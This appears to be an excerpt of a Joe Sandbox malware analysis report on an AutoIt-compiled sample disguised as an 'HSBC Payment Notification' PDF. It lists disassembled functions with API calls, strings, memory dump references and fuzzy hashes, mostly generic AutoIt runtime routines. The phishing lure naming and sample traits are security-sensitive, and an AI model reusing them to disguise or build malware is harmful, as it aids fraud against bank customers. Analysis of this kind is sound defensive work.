GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59

Strings

Removable, xrefs: 0046AE4D
SCSI, xrefs: 0046AEC6
Virtual, xrefs: 0046AF21
PhysicalDrive, xrefs: 0046ADA7
SSD, xrefs: 0046AE86
Fibre, xrefs: 0046AEE9
ATA, xrefs: 0046AED4
RAID, xrefs: 0046AEF7
\\.\, xrefs: 0046AD70
Unknown, xrefs: 0046AE1B, 0046AEBF
Network, xrefs: 0046AE39
SSA, xrefs: 0046AEE2
RAMDisk, xrefs: 0046AE25
Fixed, xrefs: 0046AE43
USB, xrefs: 0046AEF0
iSCSI, xrefs: 0046AEFE
FileBackedVirtual, xrefs: 0046AF28
1394, xrefs: 0046AEDB
SAS, xrefs: 0046AF05
SATA, xrefs: 0046AF0C
MMC, xrefs: 0046AF1A
ATAPI, xrefs: 0046AECD
CDROM, xrefs: 0046AE2F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F

Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00406931
__wcsnicmp.LIBCMT ref: 00406949
__wcsnicmp.LIBCMT ref: 00406961
__wcsnicmp.LIBCMT ref: 00406979
__wcsnicmp.LIBCMT ref: 00406991
__wcsnicmp.LIBCMT ref: 004069A9
__wcsnicmp.LIBCMT ref: 004069C1
__wcsnicmp.LIBCMT ref: 004069D5
__wcsnicmp.LIBCMT ref: 00406A16
__wcsnicmp.LIBCMT ref: 00406A2A
__wcsnicmp.LIBCMT ref: 00406A3E
__wcsnicmp.LIBCMT ref: 00406A52

Strings

#cs, xrefs: 004069CF, 00406A24
#comments-end, xrefs: 00406A38
Unterminated group of comments, xrefs: 0043E403
#requireadmin, xrefs: 0040695B
Bad directive syntax error, xrefs: 0043E31A
#pragma compile, xrefs: 0040692B
#include, xrefs: 004069A3
#OnAutoItStartRegister, xrefs: 00406973
Cannot parse #include, xrefs: 0043E3F0
#include-once, xrefs: 0040698B
#ce, xrefs: 00406A4C
#notrayicon, xrefs: 00406943
#comments-start, xrefs: 004069BB, 00406A10

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 91910eb341abf589b18a8827fbd5de9ccb9f4f90845a8da4aca72790487ce893
Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
Opcode Fuzzy Hash: 91910eb341abf589b18a8827fbd5de9ccb9f4f90845a8da4aca72790487ce893
Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D

Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0048A903
SetTextColor.GDI32(?,?), ref: 0048A907
GetSysColorBrush.USER32(0000000F), ref: 0048A91D
GetSysColor.USER32(0000000F), ref: 0048A928
CreateSolidBrush.GDI32(?), ref: 0048A92D
GetSysColor.USER32(00000011), ref: 0048A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
SelectObject.GDI32(?,00000000), ref: 0048A964
SetBkColor.GDI32(?,00000000), ref: 0048A96D
SelectObject.GDI32(?,?), ref: 0048A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
DrawFocusRect.USER32(?,?), ref: 0048AA3D
GetSysColor.USER32(00000011), ref: 0048AA4B
SetTextColor.GDI32(?,00000000), ref: 0048AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
DeleteObject.GDI32(?), ref: 0048AA89
SelectObject.GDI32(?,?), ref: 0048AA8F
DeleteObject.GDI32(?), ref: 0048AA94
SetTextColor.GDI32(?,?), ref: 0048AA9A
SetBkColor.GDI32(?,?), ref: 0048AAA4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9f9ff994320009f47fa3ebfc46be69792ddda53036695cf8c0c8eb91f145c6fb
Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
Opcode Fuzzy Hash: 9f9ff994320009f47fa3ebfc46be69792ddda53036695cf8c0c8eb91f145c6fb
Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54

Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
CharNextW.USER32(0000014E), ref: 00488B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
_memset.LIBCMT ref: 00488C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
_memset.LIBCMT ref: 00488CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
DrawMenuBar.USER32(?), ref: 00488EC3
SetWindowTextW.USER32(?,0000014E), ref: 00488EEB

Strings

0, xrefs: 00488E55

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: ab04cc0916547e3056cdb08d486fab66b59399e9446ef2c0650d6353511c45cf
Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
Opcode Fuzzy Hash: ab04cc0916547e3056cdb08d486fab66b59399e9446ef2c0650d6353511c45cf
Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69

Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004849CA
GetDesktopWindow.USER32 ref: 004849DF
GetWindowRect.USER32(00000000), ref: 004849E6
GetWindowLongW.USER32(?,000000F0), ref: 00484A48
DestroyWindow.USER32(?), ref: 00484A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
IsWindowVisible.USER32(?), ref: 00484B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
GetWindowRect.USER32(?,?), ref: 00484B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
CopyRect.USER32(?,?), ref: 00484BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00484C32

Strings

tooltips_class32, xrefs: 00484A96
(, xrefs: 00484BA3
0, xrefs: 00484975

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59

Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
_wcscpy.LIBCMT ref: 00464500
_wcscmp.LIBCMT ref: 0046450B
_wcscat.LIBCMT ref: 00464521
_wcsstr.LIBCMT ref: 0046452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
_wcscat.LIBCMT ref: 00464591
_wcscat.LIBCMT ref: 00464598
_wcsncpy.LIBCMT ref: 004645C3

Strings

DefaultLangCodepage, xrefs: 004645AB
StringFileInfo\, xrefs: 0046451B
%u.%u.%u.%u, xrefs: 00464626
\VarFileInfo\Translation, xrefs: 00464540
04090000, xrefs: 0046457E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f0729395be075f88fc279044d0d41c19dcc7b5844225c9c03bf13a05e8a0f27d
Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
Opcode Fuzzy Hash: f0729395be075f88fc279044d0d41c19dcc7b5844225c9c03bf13a05e8a0f27d
Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE

Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
GetSystemMetrics.USER32(00000007), ref: 004028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
GetSystemMetrics.USER32(00000008), ref: 004028F7
GetSystemMetrics.USER32(00000004), ref: 0040291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
GetClientRect.USER32(00000000,000000FF), ref: 004029AE
GetStockObject.GDI32(00000011), ref: 004029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5

Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7

SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC

Strings

AutoIt v3 GUI, xrefs: 00402974

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
Opcode Fuzzy Hash: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58

Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
__swprintf.LIBCMT ref: 0045A51B
_wcscmp.LIBCMT ref: 0045A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
_wcscmp.LIBCMT ref: 0045A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
GetDlgCtrlID.USER32(?), ref: 0045A648
GetWindowRect.USER32(?,?), ref: 0045A67E
GetParent.USER32(?), ref: 0045A69C
ScreenToClient.USER32(00000000), ref: 0045A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
_wcscmp.LIBCMT ref: 0045A731
GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
_wcscmp.LIBCMT ref: 0045A76B

Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634

Strings

%s%u, xrefs: 0045A515

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A

Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
_wcscmp.LIBCMT ref: 0045AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
_wcscmp.LIBCMT ref: 0045AF8C
_wcsstr.LIBCMT ref: 0045AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
_wcscmp.LIBCMT ref: 0045AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
_wcscmp.LIBCMT ref: 0045B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
GetWindowRect.USER32(00000004,?), ref: 0045B0F6

Strings

@, xrefs: 0045AEF9
ThumbnailClass, xrefs: 0045AFE0, 0045B060

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA

Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DragQueryPoint.SHELL32(?,?), ref: 0048C627

Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
_wcscat.LIBCMT ref: 0048C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
DragFinish.SHELL32(?), ref: 0048C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851

Strings

pbL, xrefs: 0048C79B
@GUI_DROPID, xrefs: 0048C77E
@GUI_DRAGFILE, xrefs: 0048C800
@GUI_DRAGID, xrefs: 0048C7C9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
API String ID: 169749273-3863044002
Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A

Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045AC33

Strings

[ACTIVE, xrefs: 0045AC20
[LAST, xrefs: 0045ACE0
REGEXP=, xrefs: 0045AC48
[CLASS:, xrefs: 0045AC83
ACTIVE, xrefs: 0045AC0E
LAST, xrefs: 0045ABF8
[HANDLE:, xrefs: 0045AC3F
ALL, xrefs: 0045ACC7
HANDLE=, xrefs: 0045AC2C
CLASSNAME=, xrefs: 0045AC70
[ALL, xrefs: 0045ACD9
[REGEXPTITLE:, xrefs: 0045AC5B

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
